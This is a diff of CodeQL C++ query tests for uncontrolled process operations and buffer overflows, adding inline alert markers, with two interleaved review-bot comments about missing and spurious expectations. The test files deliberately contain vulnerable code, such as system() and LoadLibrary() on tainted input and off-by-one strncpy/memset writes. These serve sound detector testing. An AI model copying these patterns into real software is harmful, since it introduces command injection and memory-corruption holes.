a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/UncontrolledProcessOperation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-114/UncontrolledProcessOperation.ql +query: Security/CWE/CWE-114/UncontrolledProcessOperation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp index ed3adcb8d809..064ba375a0f4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-114/semmle/UncontrolledProcessOperation/test.cpp 
@@ -23,12 +23,12 @@ class MyDerived : public MyBase void doCommand2(const char *command) { - system(command); // BAD (externally controlled string) + system(command); // BAD (externally controlled string) // $ Alert } void doCommand3(const char *command) { - system(command); // BAD (externally controlled string) + system(command); // BAD (externally controlled string) // $ Alert } }; @@ -39,8 +39,8 @@ void testMyDerived() MyBase *md3 = new MyDerived; // MyBase pointer to a MyDerived md1->doCommand1("fixed"); - md2->doCommand2(getenv("varname")); - md3->doCommand3(getenv("varname")); + md2->doCommand2(getenv("varname")); // $ Source + md3->doCommand3(getenv("varname")); // $ Source } // --- @@ -53,16 +53,16 @@ void testReferencePointer1() { char buffer[1024]; - if (fgets(buffer, 1024, stdin) != 0) + if (fgets(buffer, 1024, stdin) != 0) // $ Source { char *data = buffer; char *&dataref = data; char *data2 = dataref; - system(buffer); // BAD - system(data); // BAD - system(dataref); // BAD - system(data2); // BAD + system(buffer); // BAD // $ Alert + system(data); // BAD // $ Alert + system(dataref); // BAD // $ Alert + system(data2); // BAD // $ Alert } } @@ -73,9 +73,9 @@ void testReferencePointer2() char *&dataref = data; char *data2 = dataref; - if (fgets(buffer, 1024, stdin) != 0) + if (fgets(buffer, 1024, stdin) != 0) // $ Source { - system(buffer); // BAD + system(buffer); // BAD // $ Alert system(data); // BAD system(dataref); // BAD [NOT DETECTED] system(data2); // BAD [NOT DETECTED] 
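Review bot: In `testReferencePointer2` the calls `system(data)`, `system(dataref)` and `system(data2)` stay labelled BAD but get no inline expectation, and `system(data)` lacks even the `[NOT DETECTED]` tag its two neighbours carry. The `#select` rows of the `.expected` file list only `test.cpp:78` for this function, so all three are known false negatives. Writing them as `system(data); // BAD [NOT DETECTED] // $ MISSING: Alert`, with the same suffix on the other two, keeps the detection gap for tainted `system` arguments visible in the test itself. The same applies to `strncpy(str->string, buf, size + 1); // BAD [NOT DETECTED]` in the `@@ -39,7 +39,7 @@` hunk of `CWE-119/SAMATE/test.cpp`. The body of `testReferencePointer2` starts and ends outside this hunk.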
@@ -95,21 +95,21 @@ void testAcceptRecv(int socket1, int socket2) { char buffer[1024]; - recv(socket1, buffer, 1024); - LoadLibrary(buffer); // BAD: using data from recv + recv(socket1, buffer, 1024); // $ Source + LoadLibrary(buffer); // BAD: using data from recv // $ Alert } { char buffer[1024]; accept(socket2, 0, 0); - recv(socket2, buffer, 1024); - LoadLibrary(buffer); // BAD: using data from recv + recv(socket2, buffer, 1024); // $ Source + LoadLibrary(buffer); // BAD: using data from recv // $ Alert } } void argumentUse(char *ptr, FILE *stream) { char buffer[80]; - ptr = fgets(buffer, sizeof(buffer), stream); - system(ptr); // BAD + ptr = fgets(buffer, sizeof(buffer), stream); // $ Source + system(ptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref index 9636c74d0a8f..76b6e5900218 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/BadlyBoundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/BadlyBoundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/BadlyBoundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref index d934901f174f..0e9b8f83382e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OffsetUseBeforeRangeCheck.qlref @@ -1 +1,2 @@ -Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql \ No newline at end of file +query: Best Practices/Likely Errors/OffsetUseBeforeRangeCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref index 5c2bacec579f..bb308ea4b215 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowBuffer.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-119/OverflowBuffer.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverflowBuffer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref index a4213e22fcd7..0e0d1d3792de 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowDestination.qlref @@ -1 +1,2 @@ -Critical/OverflowDestination.ql \ No newline at end of file +query: Critical/OverflowDestination.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref index 9ff1c3b33dc5..93d88e7802a0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverflowStatic.qlref 
@@ -1 +1,2 @@
-Critical/OverflowStatic.ql
\ No newline at end of file
+query: Critical/OverflowStatic.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref
index f6c962c1a7b4..18ae0f2a567b 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWrite.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWrite.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWrite.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref
index 757d1592e830..ba8f6a96a1fd 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteFloat.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-120/OverrunWriteFloat.ql
\ No newline at end of file
+query: Security/CWE/CWE-120/OverrunWriteFloat.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected
index 3a2b7372831d..b81401816205 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.expected
@@ -1,3 +1,19 @@ +#select +| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | +| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | +| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | +| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | +| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | +| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | +| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | +| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. | test.cpp:187:22:187:27 | string | string | +| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. 
| test.cpp:195:22:195:27 | string | string | +| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | +| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | +| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | +| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | +| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | +| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | edges | test.cpp:16:11:16:21 | **mk_string_t [string] | test.cpp:39:21:39:31 | *call to mk_string_t [string] | provenance | | | test.cpp:18:5:18:7 | *str [post update] [string] | test.cpp:19:5:19:7 | *str [string] | provenance | | 
@@ -108,19 +124,3 @@ nodes subpaths | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [Return] [string] | test.cpp:242:16:242:19 | set_string output argument [string] | | test.cpp:242:22:242:27 | buffer | test.cpp:235:40:235:45 | buffer | test.cpp:235:27:235:31 | *p_str [string] | test.cpp:242:16:242:19 | set_string output argument [string] | -#select -| test.cpp:42:5:42:11 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:42:18:42:23 | string | This write may overflow $@ by 1 element. | test.cpp:42:18:42:23 | string | string | -| test.cpp:72:9:72:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:72:22:72:27 | string | This write may overflow $@ by 1 element. | test.cpp:72:22:72:27 | string | string | -| test.cpp:80:9:80:15 | call to strncpy | test.cpp:18:19:18:24 | call to malloc | test.cpp:80:22:80:27 | string | This write may overflow $@ by 2 elements. | test.cpp:80:22:80:27 | string | string | -| test.cpp:152:5:152:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:152:18:152:23 | string | This write may overflow $@ by 1 element. | test.cpp:152:18:152:23 | string | string | -| test.cpp:154:5:154:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:154:18:154:23 | string | This write may overflow $@ by 1 element. | test.cpp:154:18:154:23 | string | string | -| test.cpp:156:5:156:11 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:156:18:156:23 | string | This write may overflow $@ by 2 elements. | test.cpp:156:18:156:23 | string | string | -| test.cpp:175:9:175:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:175:22:175:27 | string | This write may overflow $@ by 1 element. | test.cpp:175:22:175:27 | string | string | -| test.cpp:187:9:187:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:187:22:187:27 | string | This write may overflow $@ by 1 element. 
| test.cpp:187:22:187:27 | string | string | -| test.cpp:195:9:195:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:195:22:195:27 | string | This write may overflow $@ by 1 element. | test.cpp:195:22:195:27 | string | string | -| test.cpp:199:9:199:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:199:22:199:27 | string | This write may overflow $@ by 2 elements. | test.cpp:199:22:199:27 | string | string | -| test.cpp:203:9:203:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:203:22:203:27 | string | This write may overflow $@ by 2 elements. | test.cpp:203:22:203:27 | string | string | -| test.cpp:207:9:207:15 | call to strncpy | test.cpp:147:19:147:24 | call to malloc | test.cpp:207:22:207:27 | string | This write may overflow $@ by 3 elements. | test.cpp:207:22:207:27 | string | string | -| test.cpp:243:5:243:10 | call to memset | test.cpp:241:20:241:38 | call to malloc | test.cpp:243:12:243:21 | string | This write may overflow $@ by 1 element. | test.cpp:243:16:243:21 | string | string | -| test.cpp:250:5:250:10 | call to memset | test.cpp:249:14:249:33 | call to my_alloc | test.cpp:250:12:250:12 | p | This write may overflow $@ by 1 element. | test.cpp:250:12:250:12 | p | p | -| test.cpp:266:5:266:10 | call to memset | test.cpp:262:15:262:30 | call to malloc | test.cpp:266:12:266:12 | p | This write may overflow $@ by 1 element. | test.cpp:266:12:266:12 | p | p | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref index 1a418e6abc6a..8ea70c432a1a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/OverrunWriteProductFlow.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-119/OverrunWriteProductFlow.ql \ No newline at end of file +query: Security/CWE/CWE-119/OverrunWriteProductFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref index bf0bf1ea7d05..3a2ef158d3d6 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected index e217064d1dfc..58f42bec0c84 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.expected @@ -1,4 +1,4 @@ +#select edges nodes subpaths -#select diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref index 767f2ea4db9d..36c47957d339 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/UnboundedWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/UnboundedWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/UnboundedWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref index 94b53951c4b7..8dcc2f70c2f6 100644 
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/VeryLikelyOverrunWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql \ No newline at end of file +query: Security/CWE/CWE-120/VeryLikelyOverrunWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp index ca6ca9a5c5a8..afba134ead8a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/test.cpp @@ -15,7 +15,7 @@ typedef struct string_t *mk_string_t(int size) { string_t *str = (string_t *) malloc(sizeof(string_t)); - str->string = malloc(size); + str->string = malloc(size); // $ Source[cpp/overrun-write] str->size = size; return str; } @@ -39,7 +39,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { string_t *str = mk_string_t(size); strncpy(str->string, buf, str->size); // GOOD - strncpy(str->string, buf, str->size + 1); // BAD + strncpy(str->string, buf, str->size + 1); // BAD // $ Alert[cpp/overrun-write] strncpy(str->string, buf, size); // GOOD strncpy(str->string, buf, size + 1); // BAD [NOT DETECTED] @@ -69,7 +69,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 1) { @@ -77,7 +77,7 @@ void test3(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 2) { 
@@ -144,16 +144,16 @@ void test4(unsigned size, char *buf, unsigned anotherSize) { void test5(unsigned size, char *buf, unsigned anotherSize) { string_t *str = (string_t *) malloc(sizeof(string_t)); - str->string = malloc(size - 1); + str->string = malloc(size - 1); // $ Source[cpp/overrun-write] str->size = size - 1; strncpy(str->string, buf, str->size); // GOOD strncpy(str->string, buf, str->size - 1); // GOOD - strncpy(str->string, buf, str->size + 1); // BAD + strncpy(str->string, buf, str->size + 1); // BAD // $ Alert[cpp/overrun-write] - strncpy(str->string, buf, size); // BAD + strncpy(str->string, buf, size); // BAD // $ Alert[cpp/overrun-write] strncpy(str->string, buf, size - 1); // GOOD - strncpy(str->string, buf, size + 1); // BAD + strncpy(str->string, buf, size + 1); // BAD // $ Alert[cpp/overrun-write] if(anotherSize < str->size) { strncpy(str->string, buf, anotherSize); // GOOD @@ -172,7 +172,7 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= size) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size - 1) { @@ -184,7 +184,7 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize < size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize < size - 1) { 
@@ -192,19 +192,19 @@ void test5(unsigned size, char *buf, unsigned anotherSize) { } if(anotherSize <= str->size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 1) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= str->size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } if(anotherSize <= size + 2) { - strncpy(str->string, buf, anotherSize); // BAD + strncpy(str->string, buf, anotherSize); // BAD // $ Alert[cpp/overrun-write] } } @@ -238,16 +238,16 @@ void set_string(string_t* p_str, char* buffer) { void test_flow_through_setter(unsigned size) { string_t str; - char* buffer = (char*)malloc(size); + char* buffer = (char*)malloc(size); // $ Source[cpp/overrun-write] set_string(&str, buffer); - memset(str.string, 0, size + 1); // BAD + memset(str.string, 0, size + 1); // BAD // $ Alert[cpp/overrun-write] } void* my_alloc(unsigned size); void foo(unsigned size) { - int* p = (int*)my_alloc(size); // BAD - memset(p, 0, size + 1); + int* p = (int*)my_alloc(size); // BAD // $ Source[cpp/overrun-write] + memset(p, 0, size + 1); // $ Alert[cpp/overrun-write] } void test6(unsigned long n, char *p) { @@ -259,11 +259,11 @@ void test6(unsigned long n, char *p) { } void test7(unsigned n) { - char* p = (char*)malloc(n); + char* p = (char*)malloc(n); // $ Source[cpp/overrun-write] if(!p) { p = (char*)malloc(++n); } - memset(p, 0, n); // GOOD [FALSE POSITIVE] + memset(p, 0, n); // GOOD [FALSE POSITIVE] // $ Alert[cpp/overrun-write] } void test8(unsigned size, unsigned src_pos) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp index 61b69d951858..1806be58d7d6 100644 
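Review bot: In `test7` the line `memset(p, 0, n); // GOOD [FALSE POSITIVE] // $ Alert[cpp/overrun-write]` records a known false positive as an ordinary expected alert, so the test reads as if the result were wanted. The inline-expectations syntax has a marker for this case: `memset(p, 0, n); // GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert[cpp/overrun-write]`. The `@@ -303,7 +303,7 @@` hunk of `tests.cpp` has the same pattern on `wcsncpy(data, source, wcslen(source) + 1); // [FALSE POSITIVE RESULT] (debatable)`, which would take `// $ SPURIOUS: Alert[cpp/bad-strncpy-size]`.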
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-119/SAMATE/tests.cpp @@ -168,8 +168,8 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE805_char_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); free(data); } @@ -189,8 +189,8 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_declare_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -209,8 +209,8 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_alloca_memcpy_01_bad() memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if the size of data is less than the length of source */ - memcpy(data, source, 100*sizeof(char)); - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + memcpy(data, source, 100*sizeof(char)); // $ Alert[cpp/overflow-buffer] + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } 
@@ -234,7 +234,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_alloca_loop_01_bad() { data[i] = source[i]; } - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -258,7 +258,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE805_char_declare_loop_01_bad() { data[i] = source[i]; } - data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = '\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printLine(data); } } @@ -287,7 +287,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE193_wchar_t_ncpy_01 wchar_t source[10+1] = SRC_STRING; /* Copy length + 1 to include NUL terminator from source */ /* POTENTIAL FLAW: data may not have enough space to hold source */ - wcsncpy(data, source, wcslen(source) + 1); + wcsncpy(data, source, wcslen(source) + 1); // $ Alert[cpp/bad-strncpy-size] printWLine(data); delete [] data; } @@ -303,7 +303,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE193_wchar_t_ncpy_01 wchar_t source[10+1] = SRC_STRING; /* Copy length + 1 to include NUL terminator from source */ /* POTENTIAL FLAW: data may not have enough space to hold source */ - wcsncpy(data, source, wcslen(source) + 1); // [FALSE POSITIVE RESULT] (debatable) + wcsncpy(data, source, wcslen(source) + 1); // [FALSE POSITIVE RESULT] (debatable) // $ Alert[cpp/bad-strncpy-size] printWLine(data); delete [] data; } @@ -347,7 +347,7 @@ namespace CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_char_ncat_01 memset(source, 'C', 100-1); /* fill with 'C's */ source[100-1] = '\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than sizeof(data)-strlen(data) */ - strncat(data, source, 100); + strncat(data, source, 100); // $ Alert[cpp/badly-bounded-write] printLine(data); delete [] data; } 
@@ -381,7 +381,7 @@ void CWE121_Stack_Based_Buffer_Overflow__CWE131_memcpy_01_bad() { int source[10] = {0}; /* POTENTIAL FLAW: Possible buffer overflow if data was not allocated correctly in the source */ - memcpy(data, source, 10*sizeof(int)); + memcpy(data, source, 10*sizeof(int)); // $ Alert[cpp/overflow-buffer] printIntLine(data[0]); } } @@ -431,7 +431,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_loop_01_bad() { data[i] = source[i]; } - data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ + data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printWLine(data); delete [] data; } @@ -449,8 +449,8 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_ncpy_01_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ /* POTENTIAL FLAW: Possible buffer overflow if source is larger than data */ - wcsncpy(data, source, 100-1); - data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ + wcsncpy(data, source, 100-1); // $ Alert[cpp/bad-strncpy-size] Alert[cpp/badly-bounded-write] + data[100-1] = L'\0'; /* Ensure the destination buffer is null terminated */ // $ Alert[cpp/overflow-buffer] printWLine(data); delete [] data; } @@ -478,7 +478,7 @@ void CWE122_Heap_Based_Buffer_Overflow__cpp_CWE805_wchar_t_snprintf_01_bad() wmemset(source, L'C', 100-1); /* fill with L'C's */ source[100-1] = L'\0'; /* null terminate */ 